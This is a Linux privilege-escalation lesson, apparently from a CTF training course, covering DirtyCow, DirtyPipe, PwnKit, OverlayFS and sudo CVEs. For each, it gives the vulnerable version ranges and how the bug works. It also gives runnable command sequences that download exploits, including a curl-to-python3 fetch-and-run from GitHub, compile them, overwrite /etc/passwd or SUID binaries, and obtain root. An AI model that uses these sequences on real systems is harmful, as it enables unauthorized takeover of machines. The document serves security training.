Famous Kernel Exploits

advanced35 minWriteup

DirtyCow, DirtyPipe, and other famous kernel vulns

Learning Objectives

  • Understand DirtyCow vulnerability
  • Exploit DirtyPipe (CVE-2022-0847)
  • Use other famous kernel CVEs
  • Know when to use kernel exploits

Some kernel exploits become so famous they get names: DirtyCow, DirtyPipe, PwnKit. These are the "greatest hits" of Linux privilege escalation - well-documented, widely affecting, and relatively reliable.

Think of these like legendary heists in hacker lore. Everyone knows them, everyone's heard the stories, and if you find one that works, you're in luck. This lesson covers the most famous Linux exploits, when they apply, and exactly how to use them.

CTF Goldmines

These exploits frequently appear in CTFs because they're well-known and educational. Check kernel version, check for PwnKit - these should be early in your enumeration.

DirtyCow (CVE-2016-5195)

The granddaddy of modern kernel exploits. DirtyCow exploits a race condition in the kernel's Copy-On-Write (COW) mechanism, allowing write access to read-only memory mappings. It was in the kernel for 9 years before discovery.

bash
1606070;"># Affected Versions
2606070;"># Linux Kernel 2.x through 4.x before 4.8.3
3606070;"># Nearly every Linux system from ~2007-2016
4 
5606070;"># Check if vulnerable
6uname -r
7606070;"># Vulnerable examples: 2.6.x, 3.x.x, 4.0-4.8.2
8606070;"># Patched: 4.8.3+, or distro backports
9 
10606070;"># Multiple exploit versions exist:
11606070;"># 1. /etc/passwd overwrite (adds root user)
12606070;"># 2. SUID binary creation
13606070;"># 3. Write arbitrary files
14 
15606070;"># === Method 1: passwd Overwrite ===
16606070;"># Download exploit
17searchsploit -m 40839.c
18 
19606070;"># Compile
20gcc -pthread 40839.c -o dirty -lcrypt
21 
22606070;"># Run
23./dirty
24606070;"># Enter new password: hacked
25606070;"># Wait... (can take 1-2 minutes)
26 
27606070;"># When done:
28su firefart
29606070;"># Password: hacked
30id
31606070;"># uid=0(root)
32 
33606070;"># === Method 2: SUID Binary ===
34searchsploit -m 40847.cpp
35g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
36./dcow
37 
38606070;"># Creates SUID version of passwd
39606070;"># Use it to change root password
40 
41606070;"># === Method 3: Write Any File ===
42606070;"># Can overwrite any file you can read
43606070;"># More targeted but more complex

DirtyCow Corruption Risk

DirtyCow exploits race conditions and can corrupt files. The passwd overwrite permanently modifies /etc/passwd. Always have a backup plan and clean up after yourself.

DirtyCow Technical Details

1How DirtyCow Works:
2├── mmap() a read-only file with PROT_READ
3├── Fork a thread that calls madvise(MADV_DONTNEED)
4├── Fork another thread that writes to /proc/self/mem
5├── Race condition: write wins sometimes
6└── Result: Write to read-only memory → file modified
7 
8Why 606070;">#a5d6ff;">"Dirty" + "COW":
9├── COW = Copy-On-Write (kernel memory optimization)
10├── Dirty = The exploit 606070;">#a5d6ff;">"dirties" the page cache
11└── The race corrupts the COW mechanism
12 
13Side Effects:
14├── Can corrupt file if exploit interrupted
15├── May crash system under heavy load
16├── Changes are persistent (actual file modified)
17└── Leaves evidence in modified files

DirtyPipe (CVE-2022-0847)

The spiritual successor to DirtyCow. DirtyPipe allows writing to arbitrary files even without write permissions - but it's in the page cache only and doesn't persist. More elegant, more reliable, but shorter vulnerable window.

bash
1606070;"># Affected Versions
2606070;"># Linux Kernel 5.8 through 5.16.10
3606070;"># Also 5.15.x before 5.15.25
4606070;"># Fixed in 5.16.11, 5.15.25, 5.10.102
5 
6606070;"># Check if vulnerable
7uname -r
8606070;"># 5.8, 5.9, 5.10.x, 5.11, 5.12, 5.13, 5.14, 5.15.x, 5.16.x
9 
10606070;"># Quick version check
11uname -r | grep -E 606070;">#a5d6ff;">"^5\.(8|9|1[0-6])"
12 
13606070;"># === Standard Exploit ===
14606070;"># Download
15wget https:606070;">//raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit-1.c
16606070;"># Or: searchsploit -m 50808.c
17 
18gcc exploit-1.c -o dirtypipe
19./dirtypipe /etc/passwd 1 606070;">#a5d6ff;">"\nroot2::\$1\$abc\$xyz:0:0::/root:/bin/bash"
20606070;"># Writes new root user entry
21 
22606070;"># Now login
23su root2
24606070;"># No password needed (empty password)
25 
26606070;"># === SUID Exploit ===
27wget https:606070;">//raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit-2.c
28gcc exploit-2.c -o dirtypipe2
29./dirtypipe2 /usr/bin/su
30606070;"># Overwrites SUID binary temporarily
31606070;"># Run /usr/bin/su for root shell
32 
33606070;"># Note: Changes revert on reboot (cache only)

DirtyPipe Technical Details

1How DirtyPipe Works:
2├── Create a pipe
3├── Fill pipe buffer completely
4├── Drain the pipe (leaves flags set)
5├── splice() target file into pipe
6├── Write to pipe - overwrites file in page cache
7└── The PIPE_BUF_FLAG_CAN_MERGE flag is the bug
8 
9Key Differences from DirtyCow:
10├── More reliable (no race condition)
11├── Faster execution
12├── Changes are in page cache only
13├── Reverts after cache flush/reboot
14├── Less likely to crash system
15└── Narrower vulnerable version range
16 
17Limitation:
18├── Cannot extend files (only overwrite)
19├── Cannot write at offset 0 of file
20└── Changes lost on reboot (not persistent)

DirtyPipe is Cleaner

Unlike DirtyCow, DirtyPipe doesn't permanently modify files. Changes exist only in the kernel page cache. Reboot reverts everything. This makes it safer and leaves fewer traces.

PwnKit (CVE-2021-4034)

Technically not a kernel exploit - PwnKit targets pkexec, a SUID root binary. But its impact is kernel-exploit-level: instant root on almost every Linux system from 2009 to 2022. The most reliable privilege escalation of the decade.

bash
1606070;"># Affected: pkexec (polkit) before 0.120
2606070;"># That's basically every Linux from May 2009 to January 2022
3 
4606070;"># Check if vulnerable
5pkexec --version
6606070;"># Vulnerable if 0.119 or earlier (most systems)
7 
8606070;"># Method 1: Pre-compiled
9wget https:606070;">//github.com/ly4k/PwnKit/raw/main/PwnKit
10chmod +x PwnKit
11./PwnKit
12606070;"># Instant root shell!
13 
14606070;"># Method 2: Python one-liner (if curl available)
15curl -fsSL https:606070;">//raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.py | python3
16 
17606070;"># Method 3: Compile yourself
18git clone https:606070;">//github.com/berdav/CVE-2021-4034
19cd CVE-2021-4034
20make
21./cve-2021-4034
22 
23606070;"># Method 4: Alternative C version
24searchsploit -m 50689.c
25gcc 50689.c -o pwnkit
26./pwnkit
27 
28606070;"># Why so reliable?
29606070;"># - No kernel dependency (just pkexec SUID binary)
30606070;"># - Works on any architecture
31606070;"># - Doesn't crash system
32606070;"># - Fast execution
33606070;"># - No race conditions

PwnKit Technical Details

1How PwnKit Works:
2├── pkexec reads argv[0] for the program to execute
3├── Bug: If argc is 0, pkexec reads argv[1] as program
4├── But argv[1] doesn't exist... points to envp[0]!
5├── Attacker controls envp (environment variables)
6├── pkexec re-introduces a 606070;">#a5d6ff;">"safe" env variable
7├── But the write goes past envp into argv area
8├── Attacker injects: GCONV_PATH=./payload
9├── When pkexec loads a library, our payload runs as root
10└── Result: Arbitrary code execution as root
11 
12The Bug Chain:
13├── argc == 0 (unusual but valid)
14├── Out-of-bounds read (argv[1] = envp[0])
15├── Out-of-bounds write (g_printerr triggers)
16├── Environment injection (GCONV_PATH)
17└── Shared library hijacking (our .so)
18 
19Why It's Reliable:
20├── No race condition
21├── No kernel version dependency
22├── Works on any distro with polkit
23├── Simple, fast, doesn't crash
24└── 12+ years of vulnerable systems

Always Try PwnKit

PwnKit should be in your first wave of privilege escalation checks. Check pkexec --version early. If vulnerable, you're done.

Other Famous Exploits

Netfilter (CVE-2022-25636)

bash
1606070;"># Affects: Linux 5.4 through 5.6.10
2606070;"># Heap overflow in netfilter
3 
4606070;"># Check if netfilter loaded
5lsmod | grep nf_tables
6 
7606070;"># Exploit complex, requires specific conditions
8606070;"># Less common in CTFs but appears occasionally

eBPF Exploits (Various CVEs)

bash
1606070;"># Multiple eBPF vulnerabilities 2020-2022
2606070;"># CVE-2021-3490, CVE-2021-31440, etc.
3 
4606070;"># Check eBPF availability
5cat /proc/sys/kernel/unprivileged_bpf_disabled
6606070;"># 0 = eBPF available to unprivileged users (potentially vulnerable)
7606070;"># 1 = Restricted (safer)
8 
9606070;"># eBPF exploits are complex but powerful
10606070;"># Bypass many security controls

OverlayFS (CVE-2021-3493)

bash
1606070;"># Ubuntu-specific overlay filesystem exploit
2606070;"># Affects Ubuntu kernels with overlay support
3 
4606070;"># Check
5cat /proc/filesystems | grep overlay
6 
7606070;"># Exploit
8searchsploit -m 49688.c
9gcc 49688.c -o overlayfs
10./overlayfs
11606070;"># Root shell on vulnerable Ubuntu systems

Sudo Exploits

bash
1606070;"># Not kernel exploits but equally famous
2 
3606070;"># Baron Samedit (CVE-2021-3156)
4606070;"># Heap overflow in sudo before 1.9.5p2
5sudo --version
6606070;"># 1.8.2 - 1.8.31p2, 1.9.0 - 1.9.5p1 = vulnerable
7 
8searchsploit baron samedit
9606070;"># Multiple exploits available
10 
11606070;"># CVE-2019-14287 (sudo -u#-1)
12606070;"># Bypass when (ALL, !root) is configured
13sudo -u606070;">#-1 /bin/bash

Quick Reference Card

1Famous Exploit Quick Reference:
2┌─────────────────────────────────────────────────────────────┐
3│ Exploit      │ Kernel/Version        │ Check Command        │
4├─────────────────────────────────────────────────────────────┤
5│ DirtyCow     │ < 4.8.3               │ uname -r             │
6│ DirtyPipe    │ 5.8 - 5.16.10         │ uname -r             │
7│ PwnKit       │ pkexec < 0.120        │ pkexec --version     │
8│ Baron Samedit│ sudo 1.8.2-1.9.5p1    │ sudo --version       │
9│ OverlayFS    │ Ubuntu-specific       │ Ubuntu + overlay     │
10│ Netfilter    │ 5.4 - 5.6.10          │ uname -r + lsmod     │
11└─────────────────────────────────────────────────────────────┘
12 
13Exploit Priority Order (try first to last):
141. PwnKit       - Most reliable, no kernel dependency
152. Sudo CVEs    - Check sudo version early
163. DirtyPipe    - If kernel 5.8-5.16
174. DirtyCow     - If kernel < 4.8.3
185. Others       - Specific to configuration

Famous Exploit Methodology

Famous Exploit Check Flow

1
PwnKitCheck pkexec --version (try if < 0.120)
2
SudoCheck sudo --version (Baron Samedit, others)
3
KernelCheck uname -r for DirtyPipe/DirtyCow range
4
DownloadGet appropriate exploit from GitHub/searchsploit
5
CompileMatch architecture and libraries
6
ExecuteRun and capture root shell

Knowledge Check

Quick Quiz
Question 1 of 3

What's the main difference between DirtyCow and DirtyPipe modifications?

Challenges

Identify the Right Exploit

Challenge
🔥 intermediate

You have shell on a system with kernel 5.10.0-9 and pkexec 0.118. Which famous exploit(s) would you try, and in what order?

Need a hint? (4 available)

Key Takeaways

  • PwnKit: Check pkexec --version, affects 2009-2022 systems
  • DirtyCow: Kernel < 4.8.3, permanently modifies files
  • DirtyPipe: Kernel 5.8-5.16.10, cache-only (reverts on reboot)
  • Check famous exploits early - they're often the easiest path
  • PwnKit should be first choice when available (most reliable)
  • Know the version ranges - this is testable knowledge